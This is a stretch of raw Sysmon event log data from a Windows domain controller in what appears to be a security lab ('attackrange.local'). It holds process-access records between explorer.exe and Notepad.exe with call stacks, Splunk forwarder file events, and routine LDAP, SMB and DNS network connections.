8|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000002244128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000002244127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000002244126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 23542300x80000000000000002244125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAAA681E43396C85CDD787401051AC13,SHA256=B257476DC07CFAB3747AA82BDC14F01D7432E8DFA45440B3E242748A02AF78AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E3BD8352DBFCFEAB3FE578340686DAA,SHA256=0DCBDB2ABEFA815AF86918E63AF4329C0B17406D4CF73AC69CF553319D6CDFA9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.592{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764 10341000x80000000000000002244122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.592{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e|C:\Windows\System32\SHELL32.dll+13c386|C:\Windows\System32\SHELL32.dll+13be03|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000002244121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.592{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e|C:\Windows\System32\SHELL32.dll+13c386|C:\Windows\System32\SHELL32.dll+13be03|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000002244120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.592{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f 10341000x80000000000000002244119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.592{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e 10341000x80000000000000002244118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002244115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002244114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2) 10341000x80000000000000002244113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03) 10341000x80000000000000002244112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002244111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002244110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2) 10341000x80000000000000002244109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.530{05ADC7E1-6E39-603E-FCAA-00000000AD01}1384013616C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03) 354300x80000000000000002244108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.648{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60190-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000002244107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.648{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60190-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000002244106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.547{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-974.attackrange.local60189-false10.0.1.14win-dc-974.attackrange.local389ldap 354300x80000000000000002244105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.547{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60189-false10.0.1.14win-dc-974.attackrange.local389ldap 354300x80000000000000002244104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.538{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60188-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002244103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.538{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60188-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002244102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.377{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56670- 354300x80000000000000002244101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.363{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program 